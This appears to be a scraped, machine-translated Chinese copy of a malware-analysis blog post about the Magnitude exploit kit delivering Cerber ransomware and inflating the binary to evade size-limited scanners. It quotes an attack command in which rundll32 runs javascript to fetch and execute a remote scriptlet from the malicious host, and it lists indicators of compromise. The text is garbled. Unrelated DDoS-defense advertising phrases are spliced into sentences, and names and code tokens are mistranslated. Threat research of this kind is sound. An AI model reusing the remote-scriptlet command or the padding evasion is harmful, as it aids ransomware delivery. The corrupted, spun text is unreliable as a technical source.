来自 CC防护 2021-04-04 09:23 的文章

dos防御_能不能防止_cn2防御cc

dos防御_能不能防止_cn2防御cc

作为我们对Magnitude exploit kit及其gate(我们在之前的博客文章中对其进行了简要介绍)的研究的后续,我们来看看一种用于分发Cerber勒索软件的有趣技术。漏洞工具包是一种非常有效的服务恶意负载的手段,其一个重要方面是其本身的传递机制。典型的情况是利用漏洞代码将有效负载下载到磁盘,代理服务器防御ddos,进行cc攻击防御,然后运行它。但我们在过去也看到过例外情况:下载一个加密的有效负载,然后在磁盘上拆分成两个不同的二进制文件(ref:Redkit exploit kit执行拆分)有效载荷直接下载到内存中,不需要接触磁盘,也就是无文件(ref:Angler EK:现在可以"无文件"感染)这种偏离标准的驱动下载方法背后可能有不同的动机,ddos攻击防御研究内容,但通常目标是通过采用不太常见的行为来规避防病毒扫描程序/签名。今天,我们来看一看Magnitude EK使用的另一种技术,即有效载荷在运行前被大量充气。概述Magnitude exploit kit已经使用一个对检索恶意软件有效负载(Cerber)至关重要的XML配置文件已有几个月了,一些研究人员在[1][2][3]之前就已经遇到过它。大约在7月底,根据我们的捕获,我们发现了一个新的for循环,它分配了一个正在连接的变量。这段代码动态地在现有的Cerber二进制文件中添加了"垃圾",使其初始大小从245 KB*增加到70到100 MB*之间。图1:通过较大的恶意二进制文件从Magnitude EK到Cerber感染的工作流*这些数字来自一个特定的捕捉,并将根据震级EK的变化而变化这不是一个bug,而是,正如他们所说的"一个特性",它可以绕过对文件大小有硬限制的安全产品。在本文的其余部分中,游戏ddos防御盾,我们将描述这个称为二进制填充的过程是如何在magnize EK中实现的。配送链Magnitige EK因专门向某些地理位置分发Cerber勒索软件而臭名昭著,尤其是韩国,通过自己的名为Magnigate的大门。一段时间以来,我们注意到Magnitude EK一直在使用Internet Explorer漏洞,而不必求助于Flash漏洞。EK流中另一个有趣的构件是使用包含JScript代码的XML配置文件。图2:显示EK主要构件的网络流量视图XML配置在前面的magnize EK实例中,regsvr32.exe用于检索和执行二进制负载(无需任何大小修改),ddos防御共享dns,使用作为URL参数传递的scriptlet。最初,我们看到负载是从%temp%文件夹启动的,但在7月中旬的某个时候,它也从桌面运行(也许是一个转换?):"C:\Windows\System32\regsvr32.exe"scrobj.dll/序号/序号:在7月31日,我们注意到rundll32.exe具有一个不同外观的命令仍在解析远程scriptlet:图3:通过rundll32从浏览器漏洞攻击到恶意JScript"C:\Windows\System32\rundll32.exe"javascript:"\..\mshtml,RunHTMLApplication";文档.写入();获取对象('脚本:http://7fm0cd7d16w37。无空间/4a44e2019f2e77c83f55c5c223bf10a0‘);图4:XML配置,显示了嵌入的JScript二进制填充此脚本的目的是检索原始Cerber有效负载(245 KB)并通过称为二进制填充的技术向其添加数据(95MB)。外壳应用ADODB.流用用于文本到二进制数据转换的特殊字符集(iso-8859-1)保存"文本"数据(N4mQj8624F9Npw10s61F)。这个数据达到95MB的原因是因为它通过一个循环连接该字符串14次,相当于写入"N4mQj8624F9Npw10s61F"4782969百万次(3^14)并将其保存到文件中。图5:通过向文本字符串追加数百万次来构建膨胀的二进制文件rundll32.exe下载原始Cerber并动态添加垃圾数据:图6:进程视图显示数据正在写入新的、膨胀的Cerber二进制文件图7:最终二进制文件的十六进制视图,显示添加的"垃圾"数据最后,它运行它:图8:通过rundll32调用新的Cerber二进制文件几秒钟后,Cerber加密了文件并显示了赎金:图9:墙纸劫持显示赎金笔记行业诀窍虽然Magnitude EK的分销渠道非常狭窄,但它仍然是一个有趣的漏洞利用工具包,因为它不仅有自己的门,而且还在不断地演变着各种各样的技巧。二进制填充技术显示了绕过某些安全扫描程序的努力,这些扫描程序将忽略超过一定大小的文件。但是,这并不能阻止恶意二进制文件(无论多大)运行并完全感染计算机。保护防范此类攻击的关键是阻止威胁,而不管其形式如何,并在交付链中尽早阻止它们。Malwarebytes在恶意负载被下载之前,主动停止Magnitude EK使用其反攻击模块。作为一个附加的保护层,我们的反勒索软件组件也阻止了这种"比平常更大"的错误。图10:Malwarebytes在其drive-by-download尝试中阻止Magnitude漏洞工具包图11:Malwarebytes(其他保护模块禁用以进行测试)阻止勒索软件感染工具书类[1] 在https://pcsxetrasupport3.wordpress.com/2017/04/24/a-look-at-the-magnity-exploit-kit-encoding/[2] 在https://www.zscaler.com/blogs/research/wonder-woman-pirate-and-cerber-ransomware[3] 在https://zerochagemalware.com/2017/08/01/magnity-ek-xml-package-and-changes/妥协指标震级EK217.182.227.103,旋转器-艺术网,熏蒸(步骤1)151.80.246.147511bcl9645285d2w。himlead.com网站,熏蒸(步骤2)51.254.229.220,7fm0cd7d16w37。无空间,震级EK着陆51.254.229.220,7fm0cd7d16w37。无空间,大小XML/JScript51.254.229.220,7fm0cd7d16w37。无空间,Cerber(原件)Cerber(原件)4bdd366d8ee35503cf062ae22abe5a4a2d8d8907Cerber(充气)3da8e94c6d1efe2a039f49a1e748df5eef01af5a